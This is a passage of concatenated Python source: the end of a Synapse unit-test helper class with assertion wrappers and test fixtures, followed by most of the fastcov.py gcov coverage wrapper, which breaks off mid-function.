self.assertEqual(x, y, msg=msg)
def eqish(self, x, y, places=6, msg=None):
'''
Assert X is equal to Y within places decimal places
'''
self.assertAlmostEqual(x, y, places, msg=msg)
def ne(self, x, y):
'''
Assert X is not equal to Y
'''
self.assertNotEqual(x, y)
def true(self, x, msg=None):
'''
Assert X is True
'''
self.assertTrue(x, msg=msg)
def false(self, x, msg=None):
'''
Assert X is False
'''
self.assertFalse(x, msg=msg)
def nn(self, x, msg=None):
'''
Assert X is not None
'''
self.assertIsNotNone(x, msg=msg)
def none(self, x, msg=None):
'''
Assert X is None
'''
self.assertIsNone(x, msg=msg)
def noprop(self, info, prop):
'''
Assert a property is not present in a dictionary.
'''
valu = info.get(prop, s_common.novalu)
self.eq(valu, s_common.novalu)
def raises(self, *args, **kwargs):
'''
Assert a function raises an exception.
'''
return self.assertRaises(*args, **kwargs)
async def asyncraises(self, exc, coro):
with self.assertRaises(exc):
await coro
def sorteq(self, x, y, msg=None):
'''
Assert two sorted sequences are the same.
'''
return self.eq(sorted(x), sorted(y), msg=msg)
def isinstance(self, obj, cls, msg=None):
'''
Assert a object is the instance of a given class or tuple of classes.
'''
self.assertIsInstance(obj, cls, msg=msg)
def isin(self, member, container, msg=None):
'''
Assert a member is inside of a container.
'''
self.assertIn(member, container, msg=msg)
def notin(self, member, container, msg=None):
'''
Assert a member is not inside of a container.
'''
self.assertNotIn(member, container, msg=msg)
def gt(self, x, y, msg=None):
'''
Assert that X is greater than Y
'''
self.assertGreater(x, y, msg=msg)
def ge(self, x, y, msg=None):
'''
Assert that X is greater than or equal to Y
'''
self.assertGreaterEqual(x, y, msg=msg)
def lt(self, x, y, msg=None):
'''
Assert that X is less than Y
'''
self.assertLess(x, y, msg=msg)
def le(self, x, y, msg=None):
'''
Assert that X is less than or equal to Y
'''
self.assertLessEqual(x, y, msg=msg)
def len(self, x, obj, msg=None):
'''
Assert that the length of an object is equal to X
'''
gtyps = (
s_coro.GenrHelp,
s_telepath.Genr,
s_telepath.GenrIter,
types.GeneratorType)
if isinstance(obj, gtyps):
obj = list(obj)
self.eq(x, len(obj), msg=msg)
async def agenlen(self, x, obj, msg=None):
'''
Assert that the async generator produces x items
'''
count = 0
async for _ in obj:
count += 1
self.eq(x, count, msg=msg)
def stormIsInPrint(self, mesg, mesgs):
'''
Check if a string is present in all of the print messages from a stream of storm messages.
Args:
mesg (str): A string to check.
mesgs (list): A list of storm messages.
'''
print_str = '\n'.join([m[1].get('mesg') for m in mesgs if m[0] == 'print'])
self.isin(mesg, print_str)
def stormIsInWarn(self, mesg, mesgs):
'''
Check if a string is present in all of the warn messages from a stream of storm messages.
Args:
mesg (str): A string to check.
mesgs (list): A list of storm messages.
'''
print_str = '\n'.join([m[1].get('mesg') for m in mesgs if m[0] == 'warn'])
self.isin(mesg, print_str)
def stormIsInErr(self, mesg, mesgs):
'''
Check if a string is present in all of the error messages from a stream of storm messages.
Args:
mesg (str): A string to check.
mesgs (list): A list of storm messages.
'''
print_str = '\n'.join([m[1][1].get('mesg') for m in mesgs if m[0] == 'err'])
self.isin(mesg, print_str)
def istufo(self, obj):
'''
Check to see if an object is a tufo.
Args:
obj (object): Object being inspected. This is validated to be a
tuple of length two, contiaing a str or None as the first value,
and a dict as the second value.
Notes:
This does not make any assumptions about the contents of the dictionary.
Returns:
None
'''
self.isinstance(obj, tuple)
self.len(2, obj)
self.isinstance(obj[0], (type(None), str))
self.isinstance(obj[1], dict)
@contextlib.contextmanager
def getTestConfDir(self, name, conf=None):
with self.getTestDir() as dirn:
cdir = os.path.join(dirn, name)
s_common.makedirs(cdir)
if conf:
s_common.yamlsave(conf, cdir, 'cell.yaml')
yield dirn
async def addCreatorDeleterRoles(self, core):
'''
Add two roles to a Cortex *proxy*, the `creator` and `deleter` roles.
Creator allows for node:add, prop:set and tag:add actions.
Deleter allows for node:del, prop:del and tag:del actions.
Args:
core: Auth enabled cortex.
'''
creator = await core.auth.addRole('creator')
await creator.setRules((
(True, ('node', 'add')),
(True, ('node', 'prop', 'set')),
(True, ('node', 'tag', 'add')),
(True, ('feed:data',)),
))
deleter = await core.auth.addRole('deleter')
await deleter.setRules((
(True, ('node', 'del')),
(True, ('node', 'prop', 'del')),
(True, ('node', 'tag', 'del')),
))
iadd = await core.auth.addUser('icanadd')
await iadd.grant(creator.iden)
await iadd.setPasswd('secret')
idel = await core.auth.addUser('icandel')
await idel.grant(deleter.iden)
await idel.setPasswd('secret')
@contextlib.asynccontextmanager
async def getTestHive(self):
with self.getTestDir() as dirn:
async with self.getTestHiveFromDirn(dirn) as hive:
yield hive
@contextlib.asynccontextmanager
async def getTestHiveFromDirn(self, dirn):
import synapse.lib.const as s_const
map_size = s_const.gibibyte
async with await s_lmdbslab.Slab.anit(dirn, map_size=map_size) as slab:
nexsroot = await s_nexus.NexsRoot.anit(dirn)
await nexsroot.startup(None)
async with await s_hive.SlabHive.anit(slab, nexsroot=nexsroot) as hive:
hive.onfini(nexsroot.fini)
yield hive
@contextlib.asynccontextmanager
async def getTestHiveDmon(self):
with self.getTestDir() as dirn:
async with self.getTestHiveFromDirn(dirn) as hive:
async with self.getTestDmon() as dmon:
dmon.share('hive', hive)
yield dmon
@contextlib.asynccontextmanager
async def getTestTeleHive(self):
async with self.getTestHiveDmon() as dmon:
turl = self.getTestUrl(dmon, 'hive')
async with await s_hive.openurl(turl) as hive:
yield hive
def stablebuid(self, valu=None):
'''
A stable buid generation for testing purposes
'''
if valu is None:
retn = self._NextBuid.to_bytes(32, 'big')
self._NextBuid += 1
return retn
byts = s_msgpack.en(valu)
return hashlib.sha256(byts).digest()
def stableguid(self, valu=None):
'''
A stable guid generation for testing purposes
'''
if valu is None:
retn = s_common.ehex(self._NextGuid.to_bytes(16, 'big'))
self._NextGuid += 1
return retn
byts = s_msgpack.en(valu)
return hashlib.md5(byts).hexdigest()
@contextlib.contextmanager
def withStableUids(self):
'''
A context manager that generates guids and buids in sequence so that successive test runs use the same
data
'''
with mock.patch('synapse.common.guid', self.stableguid), mock.patch('synapse.common.buid', self.stablebuid):
yield
async def runCoreNodes(self, core, query, opts=None):
'''
Run a storm query through a Cortex as a SchedCoro and return the results.
'''
async def coro():
return await core.nodes(query, opts)
return await core.schedCoro(coro())
|
fastcov.py | #!/usr/bin/env python3
# SPDX-License-Identifier: MIT
# Copyright 2018-present, Bryan Gillespie
"""
Author: Bryan Gillespie
https://github.com/RPGillespie6/fastcov
A massively parallel gcov wrapper for generating intermediate coverage formats fast
The goal of fastcov is to generate code coverage intermediate formats as fast as possible,
even for large projects with hundreds of gcda objects. The intermediate formats may then be
consumed by a report generator such as lcov's genhtml, or a dedicated frontend such as coveralls.
Sample Usage:
$ cd build_dir
$ ./fastcov.py --zerocounters
$ <run unit tests>
$ ./fastcov.py --exclude /usr/include test/ --lcov -o report.info
$ genhtml -o code_coverage report.info
"""
import re
import os
import sys
import glob
import json
import time
import fnmatch
import logging
import argparse
import threading
import subprocess
import multiprocessing
FASTCOV_VERSION = (1,14)
MINIMUM_PYTHON = (3,5)
MINIMUM_GCOV = (9,0,0)
# Interesting metrics
START_TIME = time.monotonic()
GCOVS_TOTAL = 0
GCOVS_SKIPPED = 0
# Gcov Coverage File Extensions
GCOV_GCNO_EXT = ".gcno" # gcno = "[gc]ov [no]te"
GCOV_GCDA_EXT = ".gcda" # gcda = "[gc]ov [da]ta"
# For when things go wrong...
# Start error codes at 3 because 1-2 are special
# See https://stackoverflow.com/a/1535733/2516916
EXIT_CODE = 0
EXIT_CODES = {
"gcov_version": 3,
"python_version": 4,
"unsupported_coverage_format": 5,
"excl_not_found": 6,
"bad_chunk_file": 7,
"missing_json_key": 8,
}
# Disable all logging in case developers are using this as a module
logging.disable(level=logging.CRITICAL)
class FastcovFormatter(logging.Formatter):
def format(self, record):
record.levelname = record.levelname.lower()
log_message = super(FastcovFormatter, self).format(record)
return "[{:.3f}s] {}".format(stopwatch(), log_message)
class DiffParseError(Exception):
pass
class DiffParser(object):
def _refinePaths(self, diff_metadata, diff_base_dir):
diff_metadata.pop('/dev/null', None)
diff_metadata.pop('', None)
for key, value in diff_metadata.copy().items():
diff_metadata.pop(key)
#sources without added lines will be excluded
if value:
newpath = os.path.join(diff_base_dir, key) if diff_base_dir else os.path.abspath(key)
diff_metadata[newpath] = value
def _parseTargetFile(self, line_with_target_file):
#f.e. '+++ b/README.md1' or '+++ b/README.md1 timestamp'
target_source = line_with_target_file[4:].partition('\t')[0].strip()
target_source = target_source[2:] if target_source.startswith('b/') else target_source
return target_source
def _parseHunkBoundaries(self, line_with_hunk_boundaries, line_index):
#f.e. '@@ -121,4 +122,4 @@ Time to process all gcda and parse all gcov:'
# Here ['-121,4', '+122,4']
lines_info = line_with_hunk_boundaries[3:].partition("@@")[0].strip().split(' ')
if len(lines_info) != 2:
raise DiffParseError("Found invalid hunk. Line #{}. {}".format(line_index, line_with_hunk_boundaries))
# Here ['122','4']
target_lines_info = lines_info[1].strip('+').partition(',')
target_line_current = int(target_lines_info[0])
target_lines_count = int(target_lines_info[2]) if target_lines_info[2] else 1
# Here ['121','4']
source_lines_info = lines_info[0].strip('-').partition(',')
source_line_current = int(source_lines_info[0])
source_lines_count = int(source_lines_info[2]) if source_lines_info[2] else 1
return target_line_current, target_lines_count, source_line_current, source_lines_count
def parseDiffFile(self, diff_file, diff_base_dir, fallback_encodings=[]):
diff_metadata = {}
target_source = None
target_hunk = set()
target_line_current = 0
target_line_end = 0
source_line_current = 0
source_line_end = 0
found_hunk = False
for i, line in enumerate(getSourceLines(diff_file, fallback_encodings), 1):
line = line.rstrip()
if not found_hunk:
if line.startswith('+++ '):
# refresh file
target_source = self._parseTargetFile(line)
elif line.startswith('@@ '):
# refresh hunk
target_line_current, target_lines_count, source_line_current, source_lines_count = self._parseHunkBoundaries(line, i)
target_line_end = target_line_current + target_lines_count
source_line_end = source_line_current + source_lines_count
target_hunk = set()
found_hunk = True
continue
if target_line_current > target_line_end or source_line_current > source_line_end:
raise DiffParseError("Hunk longer than expected. Line #{}. {}".format(i, line))
if line.startswith('+'):
#line related to target
target_hunk.add(target_line_current)
target_line_current = target_line_current + 1
elif line.startswith(' ') or line == '':
# line related to both
target_line_current = target_line_current + 1
source_line_current = source_line_current + 1
elif line.startswith('-'):
# line related to source
source_line_current = source_line_current + 1
elif not line.startswith('\\'): # No newline at end of file
# line with newline marker is not included into any boundaries
raise DiffParseError("Found unrecognized hunk line type. Line #{}. {}".format(i, line))
if target_line_current == target_line_end and source_line_current == source_line_end:
# Checked all lines, save data
if target_source in diff_metadata:
diff_metadata[target_source] = target_hunk.union(diff_metadata[target_source])
else:
diff_metadata[target_source] = target_hunk
target_hunk = set()
found_hunk = False
if target_line_current != target_line_end or source_line_current != source_line_end:
raise DiffParseError("Unexpected end of file. Expected hunk with {} target lines, {} source lines".format(
target_line_end - target_line_current, source_line_end - source_line_current))
self._refinePaths(diff_metadata, diff_base_dir)
return diff_metadata
def filterByDiff(self, diff_file, dir_base_dir, fastcov_json, fallback_encodings=[]):
diff_metadata = self.parseDiffFile(diff_file, dir_base_dir, fallback_encodings)
logging.debug("Include only next files: {}".format(diff_metadata.keys()))
excluded_files_count = 0
excluded_lines_count = 0
for source in list(fastcov_json["sources"].keys()):
diff_lines = diff_metadata.get(source, None)
if not diff_lines:
excluded_files_count = excluded_files_count + 1
logging.debug("Exclude {} according to diff file".format(source))
fastcov_json["sources"].pop(source)
continue
for test_name, report_data in fastcov_json["sources"][source].copy().items():
#No info about functions boundaries, removing all
for function in list(report_data["functions"].keys()):
report_data["functions"].pop(function, None)
for line in list(report_data["lines"].keys()):
if line not in diff_lines:
excluded_lines_count = excluded_lines_count + 1
report_data["lines"].pop(line)
for branch_line in list(report_data["branches"].keys()):
if branch_line not in diff_lines:
report_data["branches"].pop(branch_line)
if len(report_data["lines"]) == 0:
fastcov_json["sources"][source].pop(test_name)
if len(fastcov_json["sources"][source]) == 0:
excluded_files_count = excluded_files_count + 1
logging.debug('Exclude {} file as it has no lines due to diff filter'.format(source))
fastcov_json["sources"].pop(source)
logging.info("Excluded {} files and {} lines according to diff file".format(excluded_files_count, excluded_lines_count))
return fastcov_json
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def setExitCode(key):
global EXIT_CODE
EXIT_CODE = EXIT_CODES[key]
def setExitCodeRaw(code):
global EXIT_CODE
EXIT_CODE = code
def incrementCounters(total, skipped):
global GCOVS_TOTAL
global GCOVS_SKIPPED
GCOVS_TOTAL += total
GCOVS_SKIPPED += skipped
def stopwatch():
"""Return number of seconds since last time this was called."""
global START_TIME
end_time = time.monotonic()
delta = end_time - START_TIME
START_TIME = end_time
return delta
def parseVersionFromLine(version_str):
"""Given a string containing a dotted integer version, parse out integers and return as tuple."""
version = re.search(r'(\d+\.\d+\.\d+)', version_str)
if not version:
return (0,0,0)
return tuple(map(int, version.group(1).split(".")))
def getGcovVersion(gcov):
p = subprocess.Popen([gcov, "-v"], stdout=subprocess.PIPE)
output = p.communicate()[0].decode('UTF-8')
p.wait()
return parseVersionFromLine(output.split("\n")[0])
def removeFiles(files):
for file in files:
os.remove(file)
def getFilteredCoverageFiles(coverage_files, exclude):
def excludeGcda(gcda):
for ex in exclude:
if ex in gcda:
logging.debug("Omitting %s due to '--exclude-gcda %s'", gcda, ex)
return False
return True
return list(filter(excludeGcda, coverage_files))
def globCoverageFiles(cwd, coverage_type):
return glob.glob(os.path.join(os.path.abspath(cwd), "**/*" + coverage_type), recursive=True)
def findCoverageFiles(cwd, coverage_files, use_gcno):
coverage_type = "user provided"
if not coverage_files:
# gcov strips off extension of whatever you pass it and searches [extensionless name] + .gcno/.gcda
# We should pass either gcno or gcda, but not both - if you pass both it will be processed twice
coverage_type = GCOV_GCNO_EXT if use_gcno else GCOV_GCDA_EXT
coverage_files = globCoverageFiles(cwd, coverage_type)
logging.info("Found {} coverage files ({})".format(len(coverage_files), coverage_type))
logging.debug("Coverage files found:\n %s", "\n ".join(coverage_files))
return coverage_files
def gcovWorker(data_q, metrics_q, args, chunk, gcov_filter_options):
base_report = {"sources": {}}
gcovs_total = 0
gcovs_skipped = 0
error_exit = False
gcov_bin = args.gcov
gcov_args = ["--json-format", "--stdout"]
if args.branchcoverage or args.xbranchcoverage:
gcov_args.append("--branch-probabilities")
encoding = sys.stdout.encoding if sys.stdout.encoding else 'UTF-8'
workdir = args.cdirectory if args.cdirectory else "."
p = subprocess.Popen([gcov_bin] + gcov_args + chunk, cwd=workdir, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
for i, line in enumerate(iter(p.stdout.readline, b'')):
try:
intermediate_json = json.loads(line.decode(encoding))
except json.decoder.JSONDecodeError as e:
logging.error("Could not process chunk file '{}' ({}/{})".format(chunk[i], i+1, len(chunk)))
logging.error(str(e))
setExitCode("bad_chunk_file")
continue
if "current_working_directory" not in intermediate_json:
logging.error("Missing 'current_working_directory' for data file: {}".format(intermediate_json))
setExitCode("missing_json_key")
continue
intermediate_json_files = processGcovs(args.cdirectory, intermediate_json["files"], intermediate_json["current_working_directory"], gcov_filter_options)
for f in intermediate_json_files:
distillSource(f, base_report["sources"], args.test_name, args.xbranchcoverage)
gcovs_total += len(intermediate_json["files"])
gcovs_skipped += len(intermediate_json["files"]) - len(intermediate_json_files)
p.wait()
data_q.put(base_report)
metrics_q.put((gcovs_total, gcovs_skipped))
sys.exit(EXIT_CODE)
def processGcdas(args, coverage_files, gcov_filter_options):
chunk_size = max(args.minimum_chunk, int(len(coverage_files) / args.jobs) + 1)
processes = []
data_q = multiprocessing.Queue()
metrics_q = multiprocessing.Queue()
for chunk in chunks(coverage_files, chunk_size):
p = multiprocessing.Process(target=gcovWorker, args=(data_q, metrics_q, args, chunk, gcov_filter_options))
processes.append(p)
p.start()
logging.info("Spawned {} gcov processes, each processing at most {} coverage files".format(len(processes), chunk_size))
fastcov_jsons = []
for p in processes:
fastcov_jsons.append(data_q.get())
incrementCounters(*metrics_q.get())
for p in processes:
p.join()
if p.exitcode != 0:
setExitCodeRaw(p.exitcode)
base_fastcov = fastcov_jsons.pop()
for fj in fastcov_jsons:
combineReports(base_fastcov, fj)
return base_fastcov
def shouldFilterSource(source, gcov_filter_options):
"""Returns true if the provided source file should be filtered due to CLI options, otherwise returns false."""
# If explicit sources were passed, check for match
if gcov_filter_options["sources"]:
if source not in gcov_filter_options["sources"]:
logging.debug("Filtering coverage for '%s' due to option '--source-files'", source)
return True
# Check exclude filter
for ex in gcov_filter_options["exclude"]:
if ex in source:
logging.debug("Filtering coverage for '%s' due to option '--exclude %s'", source, ex)
return True
# Check exclude filter
for ex_glob in gcov_filter_options["exclude_glob"]:
if fnmatch.fnmatch(source, ex_glob):
logging.debug("Filtering coverage for '%s' due to option '--exclude-glob %s'", source, ex_glob)
return True
# Check include filter
if gcov_filter_options["include"]:
included = False
for inc in gcov_filter_options["include"]:
if inc in source:
included = True
break
if not included:
logging.debug("Filtering coverage for '%s' due to option '--include %s'", source, " ".join(gcov_filter_options["include"]))
return True
return False
def filterFastcov(fastcov_json, args):
logging.info("Performing filtering operations (if applicable)")
gcov_filter_options = getGcovFilterOptions(args)
for source in list(fastcov_json["sources"].keys()):
if shouldFilterSource(source, gcov_filter_options):
del fastcov_json["sources"][source]
def processGcov(cwd, gcov, source_base_dir, files, gcov_filter_options):
# Uses cwd if set, else source_base_dir from gcov json. If both are empty, uses "."
base_dir = cwd if cwd else source_base_dir
base_dir = base_dir if base_dir else "."
# Add absolute path
gcov["file_abs"] = os.path.abspath(os.path.join(base_dir, gcov["file"]))
if shouldFilterSource(gcov["file_abs"], gcov_filter_options):
return
files.append(gcov)
logging.debug("Accepted coverage for '%s'", gcov["file_abs"])
def processGcovs(cwd, gcov_files, source_base_dir, gcov_filter_options):
files = []
for gcov in gcov_files:
processGcov(cwd, gcov, source_base_dir, files, gcov_filter_options)
return files
def dumpBranchCoverageToLcovInfo(f, branches):
branch_miss = 0
branch_found = 0
brda = []
for line_num, branch_counts in branches.items():
for i, count in enumerate(branch_counts):
# Branch (<line number>, <block number>, <branch number>, <taken>)
brda.append((line_num, int(i/2), i, count))
branch_miss += int(count == 0)
branch_found += 1
for v in sorted(brda):
f.write("BRDA:{},{},{},{}\n".format(*v))
f.write("BRF:{}\n".format(branch_found)) # Branches Found
f.write("BRH:{}\n".format(branch_found - branch_miss)) # Branches Hit
def dumpToLcovInfo(fastcov_json, output):
with open(output, "w") as f:
sources = fastcov_json["sources"]
for sf in sorted(sources.keys()):
for tn in sorted(sources[sf].keys()):
data = sources[sf][tn]
f.write("TN:{}\n".format(tn)) #Test Name - used mainly in conjuction with genhtml --show-details
f.write("SF:{}\n".format(sf)) #Source File
fn_miss = 0
fn = []
fnda = []
for function, fdata in data["functions"].items():
fn.append((fdata["start_line"], function)) # Function Start Line
fnda.append((fdata["execution_count"], function)) # Function Hits
fn_miss += int(fdata["execution_count"] == 0)
# NOTE: lcov sorts FN, but not FNDA.
for v in sorted(fn):
f.write("FN:{},{}\n".format(*v))
for v in sorted(fnda):
f.write("FNDA:{},{}\n".format(*v))
f.write("FNF:{}\n".format(len(data["functions"]))) #Functions Found
f.write("FNH:{}\n".format((len(data["functions"]) - fn_miss))) #Functions Hit
if data["branches"]:
dumpBranchCoverageToLcovInfo(f, data["branches"])
line_miss = 0
da = []
for line_num, count in data["lines"].items():
da.append((line_num, count))
line_miss += int(count == 0)
for v in sorted(da):
f.write("DA:{},{}\n".format(*v)) # Line
f.write("LF:{}\n".format(len(data["lines"]))) #Lines Found
f.write("LH:{}\n".format((len(data["lines"]) - line_miss))) #Lines Hit
f.write("end_of_record\n")
def getSourceLines(source, fallback_encodings=[]):
"""Return a list of lines from the provided source, trying to decode with fallback encodings if the default fails."""
default_encoding = sys.getdefaultencoding()
for encoding in [default_encoding] + fallback_encodings:
try:
with open(source, encoding=encoding) as f:
return f.readlines()
except UnicodeDecodeError:
pass
logging.warning("Could not decode '{}' with {} or fallback encodings ({}); ignoring errors".format(source, default_encoding, ",".join(fallback_encodings)))
with open(source, errors="ignore") as f:
return f.readlines()
# Returns whether source coverage changed or not
def exclProcessSource(fastcov_sources, source, exclude_branches_sw, include_branches_sw, fallback_encodings):
# Before doing any work, check if this file even needs to be processed
if not exclude_branches_sw and not include_branches_sw:
# Ignore unencodable characters
with open(source, errors="ignore") as f:
if "LCOV_EXCL" not in f.read():
return False
# If we've made it this far we have to check every line
start_line = 0
end_line = 0
# Start enumeration at line 1 because the first line of the file is line 1 not 0
for i, line in enumerate(getSourceLines(source, fallback_encodings), 1):
# Cycle through test names (likely only 1)
for test_name in fastcov_sources[source]:
fastcov_data = fastcov_sources[source][test_name]
# Check if branch coverage should be deleted based on CLI options
if (exclude_branches_sw or include_branches_sw) and (i in fastcov_data["branches"]):
del_exclude_br = exclude_branches_sw and any(line.lstrip().startswith(e) for e in exclude_branches_sw)
del_include_br = include_branches_sw and all(not line.lstrip().startswith(e) for e in include_branches_sw)
if del_exclude_br or del_include_br:
del fastcov_data["branches"][i]
# Skip to next line as soon as possible
if "LCOV_EXCL" not in line:
continue
# Build line to function dict so can quickly delete by line number
line_to_func = {}
for f in fastcov_data["functions"].keys():
l = fastcov_data["functions"][f]["start_line"]
if l not in line_to_func:
line_to_func[l] = set()
line_to_func[l].add(f)
if "LCOV_EXCL_LINE" in line:
for key in ["lines", "branches"]:
if i in fastcov_data[key]:
del fastcov_data[key][i]
if i in line_to_func:
for key in line_to_func[i]:
if key in fastcov_data["functions"]:
del fastcov_data["functions"][key]
elif "LCOV_EXCL_START" in line:
start_line = i
elif "LCOV_EXCL_STOP" in line:
end_line = i
if not start_line:
end_line = 0
continue
for key in ["lines", "branches"]:
for line_num in list(fastcov_data[key].keys()):
if start_line <= line_num <= end_line:
del fastcov_data[key][line_num]
for line_num in range(start_line, end_line):
if line_num in line_to_func:
for key in line_to_func[line_num]:
if key in fastcov_data["functions"]:
del fastcov_data["functions"][key]
start_line = end_line = 0
elif "LCOV_EXCL_BR_LINE" in line:
if i in fastcov_data["branches"]:
del fastcov_data["branches"][i]
# Source coverage changed
return True
def exclMarkerWorker(data_q, fastcov_sources, chunk, exclude_branches_sw, include_branches_sw, fallback_encodings):
changed_sources = []
for source in chunk:
try:
if exclProcessSource(fastcov_sources, source, exclude_branches_sw, include_branches_sw, fallback_encodings):
changed_sources.append((source, fastcov_sources[source]))
except FileNotFoundError:
logging.error("Could not find '%s' to scan for exclusion markers...", source)
setExitCode("excl_not_found") # Set exit code because of error
# Write out changed sources back to main fastcov file
data_q.put(changed_sources)
# Exit current process with appropriate code
sys.exit(EXIT_CODE)
def processExclusionMarkers(fastcov_json, jobs, exclude_branches_sw, include_branches_sw, min_chunk_size, fallback_encodings):
chunk_size = max(min_chunk_size, int(len(fastcov_json["sources"]) / jobs) + 1)
processes = []
data_q = multiprocessing.Queue()
for chunk in chunks(list(fastcov_json["sources"].keys()), chunk_size):
p = multiprocessing.Process(target=exclMarkerWorker, args=(data_q, fastcov_json["sources"], chunk, exclude_branches_sw, include_branches_sw, fallback_encodings))
processes.append(p)
p.start()
logging.info("Spawned {} exclusion marker scanning processes, each processing at most {} source files".format(len(processes), chunk_size))
changed_sources = []
for p in processes:
changed_sources += data_q.get()
for p in processes:
p.join()
if p.exitcode != 0:
setExitCodeRaw(p.exitcode)
for changed_source in changed_sources:
fastcov_json["sources"][changed_source[0]] = changed_source[1]
def validateSources(fastcov_json):
logging.info("Checking if all sources exist")
for source in fastcov_json["sources"].keys():
if not os.path.exists(source):
logging.error("Cannot find '{}'".format(source))
def distillFunction(function_raw, functions):
function_name = function_raw["name"]
# NOTE: need to explicitly cast all counts coming from gcov to int - this is because gcov's json library
# will pass as scientific notation (i.e. 12+e45)
start_line = int(function_raw["start_line"])
execution_count = int(function_raw["execution_count"])
if function_name not in functions:
functions[function_name] = {
"start_line": start_line,
"execution_count": execution_count
}
else:
functions[function_name]["execution_count"] += execution_count
def emptyBranchSet(branch1, branch2):
return (branch1["count"] == 0 and branch2["count"] == 0)
def matchingBranchSet(branch1, branch2):
return (branch1["count"] == branch2["count"])
def filterExceptionalBranches(branches):
filtered_branches = []
exception_branch = False
for i in range(0, len(branches), 2):
if i+1 >= len(branches):
filtered_branches.append(branches[i])
break
# Filter exceptional branch noise
if branches[i+1]["throw"]:
exception_branch = True
continue
# Filter initializer list noise
if exception_branch and emptyBranchSet(branches[i], branches[i+1]) and len(filtered_branches) >= 2 and matchingBranchSet(filtered_branches[-1], filtered_branches[-2]):
return []
filtered_branches.append(branches[i])
filtered_branches.append(branches[i+1])
return filtered_branches
def distillLine(line_raw, lines, branches, include_exceptional_branches):
line_number = int(line_raw["line_number"])
count = int(line_raw["count"])
if line_number not in lines:
lines[line_number] = count
else:
lines[line_number] += count
# Filter out exceptional branches by default unless requested otherwise
if not include_exceptional_branches:
line_raw["branches"] = filterExceptionalBranches(line_raw["branches"])
# Increment all branch counts
for i, branch in enumerate(line_raw["branches"]):
if line_number not in branches:
branches[line_number] = []
blen = len(branches[line_number])
glen = len(line_raw["branches"])
if blen < glen:
branches[line_number] += [0] * (glen - blen)
branches[line_number][i] += int(branch["count"])
def distillSource(source_raw, sources, test_name, include_exceptional_branches):
source_name = source_raw["file_abs"]
if source_name not in sources:
sources[source_name] = {
test_name: {
"functions": {},
"branches": {},
"lines": {}
}
}
for function in source_raw["functions"]:
distillFunction(function, sources[source_name][test_name]["functions"])
for line in source_raw["lines"]:
distillLine(line, sources[source_name][test_name]["lines"], sources[source_name][test_name]["branches"], include_exceptional_branches)
def dumpToJson(intermediate, output):
with open(output, "w") as f:
json.dump(intermediate, f)
def getGcovFilterOptions(args):
return {
"sources": set([os.path.abspath(s) for s in args.sources]), #Make paths absolute, use set for fast lookups
"include": args.includepost,
"exclude": args.excludepost,
"exclude_glob":args.excludepost_glob
}
def addDicts(dict1, dict2):
"""Add dicts together by value. i.e. addDicts({"a":1,"b":0}, {"a":2}) == {"a":3,"b":0}."""
result = {k:v for k,v in dict1.items()}
for k,v in dict2.items():
if k in result:
result[k] += v
else:
result[k] = v
return result
def addLists(list1, list2):
"""Add lists together by value. i.e. addLists([1,1], [2,2]) == [3,3]."""
# Find big list and small list
blist, slist = list(list2), list(list1)
if len(list1) > len(list2):
blist, slist = slist, blist
# Overlay small list onto big list
for i, b in enumerate(slist):
blist[i] += b
return blist
def combineReports(base, overlay):
for source, scov in overlay["sources"].items():
# Combine Source Coverage
if source not in base["sources"]:
base["sources"][source] = scov
continue
for test_name, tcov in scov.items():
# Combine Source Test Name Coverage
if test_name not in base["sources"][source]:
base["sources"][source][test_name] = tcov
continue
# Drill down and create convenience variable
base_data = base["sources"][source][test_name]
# Combine Line Coverage
base_data["lines"] = addDicts(base_data["lines"], tcov["lines"])
# Combine Branch Coverage
for branch, cov in tcov["branches"].items():
if branch not in base_data["branches"]:
base_data["branches"][branch] = cov
else:
base_data["branches"][branch] = addLists(base_data["branches"][branch], cov)
# Combine Function Coverage
for function, cov in tcov["functions"].items():
if function not in base_data["functions"]:
base_data["functions"][function] = cov
else:
base_data["functions"][function]["execution_count"] += cov["execution_count"]
def parseInfo(path):
"""Parse an lcov .info file into fastcov json."""
fastcov_json = {
"sources": {}
}
with open(path) as f:
for line in f:
if line.startswith("TN:"):
current_test_name = line[3:].strip()
elif line.startswith("SF:"):
current_sf = line[3:].strip()
fastcov_json["sources"][current_sf] = {
current_test_name: {
"functions": {},
"branches": {},
"lines": {},
}
}
current_data = fastcov_json["sources"][current_sf][current_test_name]
elif line.startswith("FN:"):
line_num, function_name = line[3:].strip().split(",")
current_data["functions"][function_name] = {}
current_data["functions"][function_name]["start_line"] = int(line_num)
elif line.startswith("FNDA:"):
count, function_name = line[5:].strip().split(",")
current_data["functions"][function_name]["execution_count"] = int(count)
elif line.startswith("DA:"):
line_num, count = line[3:].strip().split(",")
current_data["lines"][line_num] = int(count)
elif line.startswith("BRDA:"):
branch_tokens = line[5:].strip().split(",")
line_num, count = branch_tokens[0], branch_tokens[-1]
if line_num not in current_data["branches"]:
current_data["branches"][line_num] = []
current_data["branches"][line_num].append(int(count))
return fastcov_json
def convertKeysToInt(report):
for source in report["sources"].keys():
for test_name in report["sources"][source].keys():
report_data = report["sources"][source][test_name]
report_data["lines"] = {int(k):v for k,v in report_data["lines"].items()}
report_data["branches"] = {int(k):v for k,v in report_data["branches"].items()}
def parseAndCombine(paths):
base_report = {}
for path in paths:
if path.endswith(".json"):
with open(path) as f:
report = json.load(f)
elif path.endswith(".info"):
report = parseInfo(path)
else:
logging.error("Currently only fastcov .json and lcov .info supported for combine operations, aborting due to %s...\n", path)
sys.exit(EXIT_CODES["unsupported_coverage_format"])
# In order for sorting to work later when we serialize,
# make sure integer keys are int
convertKeysToInt(report)
if not base_report:
base_report = report
logging.info("Setting {} as base report".format(path))
else:
combineReports(base_report, report)
logging.info("Adding {} to base report".format(path))
return base_report
def getCombineCoverage(args):
logging.info("Performing combine operation")
fastcov_json = parseAndCombine(args.combine)
filterFastcov(fastcov_json, args)
return fastcov_json
def getGcovCoverage(args):
# Need at least python 3.5 because of use of recursive glob
checkPythonVersion(sys.version_info[0:2])
# Need at least gcov 9.0.0 because that's when gcov JSON and stdout streaming was introduced
checkGcovVersion(getGcovVersion(args.gcov))
# Get list of gcda files to process
coverage_files = findCoverageFiles(args.directory, args.coverage_files, args.use_gcno)
# If gcda/gcno filtering is enabled, filter them out now
if args.excludepre:
coverage_files = getFilteredCoverageFiles(coverage_files, args.excludepre)
logging.info("Found {} coverage files after filtering".format(len(coverage_files)))
# We "zero" the "counters" by simply deleting all gcda files
if args.zerocounters:
